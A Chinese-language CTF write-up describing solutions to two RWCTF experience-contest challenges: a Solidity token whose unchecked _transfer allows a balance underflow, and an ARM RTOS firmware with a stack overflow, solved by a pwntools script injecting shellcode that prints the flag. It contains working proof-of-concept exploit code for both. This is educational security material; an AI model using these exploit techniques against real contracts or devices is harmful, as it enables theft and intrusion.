RWCTF 体验赛 the Real Menu Challenge & Blockchain方向 解答过程

Retr_0 2022-01-28 10:07:00
CTF

0x00 前言

在参加RWCTF正赛的同时也参加了体验赛,正赛还是一如既往的难度非常高,但也能非常勉强的看懂1-2个题了。正赛的区块链是一个类密码题,用数据结构做了些文章,体验赛整体难度较为简单。区块链主要考察阅读代码,同时也跟队友一起解决了一个IOT方向的赛题。这个IOT洞比较明显,也算是比较好利用的。

0x01 Blockchain Transfer

题目给出代码,是一个伪代币。

deployer.sol

pragma solidity ^0.6.6;

import "./erc20_fake.sol";

contract deployer {
    FishmenToken public fishmenToken;
    bool public isSvd;

    constructor() public {
        fishmenToken = new FishmenToken();
    }

    function solve() public returns (bool) {
        require(fishmenToken.balanceOf(msg.sender) > 100,"token balance < 100");
        isSvd = true;
    }

    function isSolved() public view returns (bool) {
        return isSvd;
    }
}

erc20_fake.sol

//SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.6.6;

abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract ERC20 is Context, IERC20 {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;

    constructor(string memory name, string memory symbol) public {
        _name = name;
        _symbol = symbol;
        _decimals = 18;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        _balances[sender] = _balances[sender] - amount;
        _balances[recipient] = _balances[recipient] + amount;
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal {
        _decimals = decimals_;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() internal {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}
contract FishmenToken is ERC20("FishmenToken", "FMT"), Ownable {
    function mint(address _to, uint256 _amount) public onlyOwner {
        _mint(_to, _amount);
    }

    function burn(address _from, uint256 _amount) public {
        _burn(_from, _amount);
    }
}

我们可以看到需要满足的条件就是调用者的代币 大于100
然后主要看的就是实现代币的这个合约。
我们可以看到这里实现了 Safemath相关的一个库。可以完全跳过,但我们注意到,在erc20的代币合约里面唯独
__transfer中没使用这种safemath,而且这里也没有对传输eth做任何的限制,没有提前检查是否有足够的eth。那么这里很轻松的可以出现整数溢出。但是这是一个internal的方法,找一下能调用他的external

可以看到转账金额和地址都为我们所控制,那么就能实现转账人的代币金额下溢,使其大于100.
poc如下:

pragma solidity ^0.6.6;
import "./erc20_fake.sol";
import "./deployer.sol";
contract hacker{
    address public setup=0xAF21dB5BAD07ECb958B3DE98DD6023bb4fbA816C;
    deployer A=deployer(setup);
    address public target=address(A.fishmenToken());
    bool public success;
    FishmenToken B=FishmenToken(target);
    constructor() public{
        B.transfer(setup,200);
        success=A.solve();
    }
}

然后把constructor的bytecode部署到私链上就可以了。

0x02 the Real Menu Challenge

算是我入门IOT的一个题,赛时@PTT0完成了整个漏洞利用,我就打打下手修了修固件。不过也学到了很多。是该题目的唯一解。

题目给出了固件 以及qemu的启动命令。IDA无法直接分析固件得到程序的入口地址。所以我们需要手动来改。赛时我们找到了一篇文章,
https://wemp.app/posts/68625bf7-1df0-4379-9b54-a6c240c0a8fa
利用其中的相关手法修改后能够得到大体的程序,

但是现在还没有程序入口地址,所以引用数据的位置都是错误的。后续通过他switch中的跳转函数表算偏移大致修了一下,Rebase Segement后成功把数据段基本也修上了。

赛后讲课师傅使用了qemu远程调试的方式直接确定数据段,非常快捷。。。学到了。

然后就开始挖洞了。

首先可以看到这些选项,menu中打印了相关的内容。
但是input_choice中我们可以轻松的看到,

他的v1大小为20,限制读入256,存在栈溢出。且这个跑在kernel上,没有任何的保护,我们考虑直接ROP打印flag。
flag在kernel中的地址为。

flag_addr=0x60022E60
puts_addr=0x60020698

填充大小为0x14。
arm架构 利用puts打印 flag就可以了。
arm的函数调用时,如果参数数目小于4,使用寄存器r0-r3进行传递
所以设置

ldr r0, =0x60022E60
ldr pc, =0x60020698

这样就可以成功打印出flag了。
我利用了比较笨的办法调试。

然后编写相关的poc 在choose返回的时候下断看就可以了。
在脚本里起qemu进程,然后用gdb远程连接。
我们一直缓冲区大小20,然后覆盖返回地址,因为他没有任何保护,我直接ret2shellcode实现puts(flag)。
下断到0x600104FC

栈上数据已经能看到了。我们让其直接跳转到

就可以往下执行了,后面虽然会因为跳转在栈上无法继续运行直接错误退出,但是我们只要能够拿到flag就足够了。
脚本如下:

from pwn import *
p=process('qemu-system-arm -m 64 -s -S -nographic -machine vexpress-a9 -kernel rtos.bin',shell=True)
context.log_level='debug'
context.arch='arm'
shellcode="""
ldr r0, =0x60022E60
ldr pc, =0x60020698
"""
p.recvuntil('change screen img\n')
payload='a'*0x14+p32(0x6045a518)+asm(shellcode)
p.sendline(payload)
p.interactive()

感谢帮我学习和赛时修文件的 Xkaneiki、PTT0、X1ng。

评论

Retr_0

Noooooooooooob

twitter weibo github wechat

随机分类

XSS 文章:34 篇
软件安全 文章:17 篇
iOS安全 文章:36 篇
渗透测试 文章:154 篇
运维安全 文章:62 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录